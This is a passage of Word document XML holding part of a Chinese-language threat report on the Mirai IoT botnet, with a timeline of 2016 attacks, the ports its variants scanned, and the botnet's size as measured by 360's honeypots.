        <w:t>2016年11月1日左右开始，利比里亚遭到Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00D94A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D94A81" w:rsidRPr="00A74D85">
        <w:t>Botnet 14 14</w:t>
      </w:r>
      <w:r w:rsidR="00D94A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击达数日之久，峰值带宽500Gbps</w:t>
      </w:r>
      <w:r w:rsidR="000E7DAA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，几乎造成全国断网</w:t>
      </w:r>
      <w:r w:rsidR="00D448BD">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="3"/>
      </w:r>
      <w:r w:rsidR="00A74D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年11月7日 Kenzo发布针对7547端口上路由器设备的TR-069/TR064安全公告</w:t>
      </w:r>
      <w:r w:rsidR="006D0D5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRPr="00452B08" w:rsidRDefault="00B437C0" w:rsidP="00452B08">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月26日</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:t>21时</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>360蜜罐首次捕捉到了针对</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7547端口的扫描。这是Mirai的</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变种，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用远程命令执行漏洞</w:t>
      </w:r>
      <w:r w:rsidR="004075FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidR="00205A54">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidR="004075FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>弱口令种植木马</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRDefault="00452B08" w:rsidP="00452B08">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月26日22时起，重庆、宁夏等省市的网络遭到了大量的SYN扫描行为，这是我们事后分析netflow等数据发现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B437C0" w:rsidRDefault="004075FC" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:t>11月27日17点04分</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，360监测到了扫描5555端口的</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="004075FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新变种。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="00257FC9" w:rsidP="00A831DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>11月28日零时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>德国当地时间11月27</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>17：00</w:t>
      </w:r>
      <w:r>
        <w:t>)左右</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>德国电信</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB" w:rsidRPr="00A831DB">
        <w:t>Deutsche Telecom</w:t>
      </w:r>
      <w:r w:rsidR="00A831DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>超90万路由器遭遇</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai僵尸网络的扫描而宕机</w:t>
      </w:r>
      <w:r w:rsidR="000F74D9">
        <w:t>，断网事故共持续数个小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月29日，</w:t>
      </w:r>
      <w:r w:rsidRPr="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口7547上的bot总量已经超过3万</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，增长速度16.1K/天，领先其他端口</w:t>
      </w:r>
      <w:r w:rsidR="00697F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的增速</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1571730324"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360161 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008631C3" w:rsidRDefault="008631C3" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月9日，360</w:t>
      </w:r>
      <w:r w:rsidR="00F20691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>率先报告他们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕获了带DGA特征的Mirai变种</w:t>
      </w:r>
      <w:r w:rsidR="00175C9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样本</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1950993463"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360162 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="001517ED">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304D7E" w:rsidRDefault="00304D7E" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月12日，360开始关注针对TCP/</w:t>
      </w:r>
      <w:r>
        <w:t>23231和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/37777上的端口扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175C9B" w:rsidRDefault="00175C9B" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月18日，360发现了Mirai开始全网扫描大华的</w:t>
      </w:r>
      <w:r w:rsidR="006322BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/</w:t>
      </w:r>
      <w:r w:rsidRPr="00175C9B">
        <w:t>6789端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00175C9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006322BE" w:rsidRDefault="006322BE" w:rsidP="00A356F2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2016年12月</w:t>
      </w:r>
      <w:r w:rsidR="00434AA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日，</w:t>
      </w:r>
      <w:r w:rsidR="00A356F2" w:rsidRPr="00A356F2">
        <w:t>Fidelis Cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="00A356F2">
        <w:t>公司的</w:t>
      </w:r>
      <w:r w:rsidR="00A356F2">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>John Bambenek</w:t>
      </w:r>
      <w:r w:rsidR="00875B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai开始扫描TCP/23231端口</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1526558890"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FD245F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FD245F">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00FD245F">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Joh \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00FD245F">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00FD245F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="00FD245F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E267E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002858A4" w:rsidRPr="00237AE8" w:rsidRDefault="002858A4" w:rsidP="002858A4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B33E7" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc472191667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络现状</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc472191668"/>
      <w:r>
        <w:t>僵尸网络规模</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="007E77BB" w:rsidRPr="007E77BB" w:rsidRDefault="007E77BB" w:rsidP="007E77BB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>受Mirai感染的设备会持续地在互联网上扫描物联网设备的IP地址。Mirai包含了一张子网掩码白名单表，其中包括专用网络的私有IP地址以及分配给美国邮政署和美国国防部IP地址，使用这些地址的设备将不会受Mirai感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1012985329"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Wik16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r w:rsidR="00C8532F">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="007E77BB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360利用自己的蜜罐建立了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>公开的</w:t>
      </w:r>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络监控系统</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1530830256"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 3601 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidRPr="00110B80">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00110B80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，截止到2016年12月10日，其监测到的Mirai僵尸网络规模已经达到了138万。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全社区认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
